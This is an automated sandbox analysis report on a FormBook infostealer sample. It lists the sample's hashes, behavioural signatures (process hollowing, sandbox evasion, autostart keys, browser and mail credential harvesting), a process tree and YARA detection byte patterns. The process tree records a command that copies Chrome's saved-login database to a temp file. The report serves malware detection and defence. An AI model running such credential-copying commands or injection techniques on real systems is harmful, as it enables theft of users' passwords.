Edit tour

Windows Analysis Report
08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Overview

General Information

Sample Name:	08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
Analysis ID:	569293
MD5:	bd0bb1e8dedb72cda230e34141e562e5
SHA1:	6fbff172a218accf4b3cdd5c8c5a7ca7ae6412f5
SHA256:	9b54b87e20d735cdb5e1dfca388756e41e8a1ea72f731e2a72b16891ae80433b
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected FormBook

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Creates multiple autostart registry keys

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Allocates memory in foreign processes

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Tries to detect virtualization through RDTSC time measurements

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Writes to foreign memory regions

Queues an APC in another process (thread injection)

.NET source code contains very large strings

Modifies the context of a thread in another process (thread injection)

Tries to resolve many domain names, but no domain seems valid

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to shutdown / reboot the system

Found potential string decryption / allocating functions

Contains functionality to call native functions

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Uses Microsoft's Enhanced Cryptographic Provider

Sigma detected: Autorun Keys Modification

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe (PID: 4520 cmdline: "C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe" MD5: BD0BB1E8DEDB72CDA230E34141E562E5)

image.exe (PID: 7008 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe MD5: 8B7BDE45C8536482F67C812C461B806D)

RegSvcs.exe (PID: 5556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 5620 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

control.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 3428 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6568 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

d6wtv4o01bbhxt.exe (PID: 1140 cmdline: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

d6wtv4o01bbhxt.exe (PID: 4840 cmdline: "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

d6wtv4o01bbhxt.exe (PID: 5876 cmdline: "C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)

conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x223e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2241a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x24cc28:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x24cfc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30dad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x30de72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x22feb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x258cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x319b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x22f9a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2587c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x319671:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x22ffb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x258dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x319c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x23012f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x258f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x319dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x224bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x24d9da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x30e88a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2322d9:$sqlite3step: 68 34 1C 7B E1 0x2323ec:$sqlite3step: 68 34 1C 7B E1 0x25b0f9:$sqlite3step: 68 34 1C 7B E1 0x25b20c:$sqlite3step: 68 34 1C 7B E1 0x31bfa9:$sqlite3step: 68 34 1C 7B E1 0x31c0bc:$sqlite3step: 68 34 1C 7B E1 0x232308:$sqlite3text: 68 38 2A 90 C5 0x23242d:$sqlite3text: 68 38 2A 90 C5 0x25b128:$sqlite3text: 68 38 2A 90 C5 0x25b24d:$sqlite3text: 68 38 2A 90 C5 0x31bfd8:$sqlite3text: 68 38 2A 90 C5 0x31c0fd:$sqlite3text: 68 38 2A 90 C5 0x23231b:$sqlite3blob: 68 53 D8 7F 8C 0x232443:$sqlite3blob: 68 53 D8 7F 8C 0x25b13b:$sqlite3blob: 68 53 D8 7F 8C 0x25b263:$sqlite3blob: 68 53 D8 7F 8C 0x31bfeb:$sqlite3blob: 68 53 D8 7F 8C 0x31c113:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: image.exe PID: 7008	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.RegSvcs.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.RegSvcs.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.RegSvcs.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.RegSvcs.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.RegSvcs.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
2.2.image.exe.3f466b0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
